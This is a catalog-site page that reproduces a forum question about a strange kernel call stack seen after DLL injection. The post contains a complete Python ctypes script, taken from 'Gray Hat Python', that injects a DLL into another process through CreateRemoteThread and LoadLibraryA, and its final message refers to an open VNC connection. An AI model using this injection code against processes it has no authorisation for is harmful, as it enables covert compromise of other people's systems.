SpeedUtilities Processes | DLLs | Operating systems | Manufacturers | CPUs | Ports | Services | Log files | Directories | Internet services | Software packages | Viruses | Network adapters | Internet bots
» An ultimate catalog of computer data
Popular: svchost.exe | csrss.exe | spoolsv.exe | mrt.exe | lsass.exe

Forum posts for ntkrnlpa.exe

Strange results while trying to inject a dll into a process via windll.kernel32.CreateRemote…

i am trying with the following task:
1. inject a dll to a process;
2. use the windll.kernel32.CreateRemoteThread() within the mode of ctypes of python;

And i am encouting the following results:
1. the new thread is created success; but
2. I can not grap this thread via windbg;
3. the call stack (grapped via processExploer) is strange:

ntkrnlpa.exe!KiUnexpectedInterrupt+0x8d
ntkrnlpa.exe!PsDereferencePrimaryToken+0x362
ntkrnlpa.exe!KiDeliverApc+0xb3
ntkrnlpa.exe!ZwYieldExecution+0x19a4
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x29b56
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2ac2b
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2b20b
ntkrnlpa.exe!PsRemoveCreateThreadNotifyRoutine+0x11d
ntkrnlpa.exe!KiDispatchInterrupt+0x5a2
kernel32.dll!CreateThread+0x22


The code is from 'gray hat python', and it's like this:

import sys
from ctypes import *

PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
pid = sys.argv[1]
dll_path = sys.argv[2]
dll_len = len(dll_path)

# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:

print '[*] Couldn't acquire a handle to PID: %s' % pid
sys.exit(0)


# Allocate some space for the DLL path
arg_address = kernel32.VirtualAllocEx( h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)

# Write the DLL path into the allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# We need to resolve the address for LoadLibraryA
h_kernel32 = kernel32.GetModuleHandleA('kernel32.dll')
h_loadlib = kernel32.GetProcAddress(h_kernel32,'LoadLibraryA')

# Now we try to create the remote thread, with the entry point set
# to LoadLibraryA and a pointer to the DLL path as it's single parameter
thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process,None,0,h_loadlib,arg_address,0,byref(thread_id)):

print '[*] Failed to inject the DLL. Exiting.'
sys.exit(0)


print '[*] Remote thread successfully created with a thread ID of: 0x%08x' % thread_id.value
print '[*] VNC Connection now open and ready for action....'

View complete forum thread with replies

Other posts related to ntkrnlpa.exe

See Related Forum Messages: Follow the Links Below to View Complete Thread

NTOSKRNL.EXE vs NTKRNLMP.EXE vs NTKRNLPA.EXE vs NTKRPAMP.EXE [closed]
Windows service and continuous memory alloc
Strange results while trying to inject a dll into a process via windll.kernel32.CreateRemote…
Unusual high cpu utilization in ntkrnlpa:FsRtlAreNamesEqual and ntkrnlpa:RtlUpcaseUnicodeString
IE hanging with 100% CPU / Got stack trace
WinDbg lmv command not working
Windbg “Processes and Threads” window doesn't change context when kernel debugging
VB.Net 2008 IDE hanging - MSVB7.dll eating 100% CPU when editing code
.NET AppDomain.Unload triggers runaway threads
VB.NET Program Locks Up with Internet Explorer Opened

What is the carbon footprint of your coffee?

Is it low? Is it high? Can this things really kill the planet Earth? Maybe the answer will surprise you. Maybe not.
>>> Check it now at GreenOrDie.org
Privacy | Best registry cleaners | SpeedUtilities.com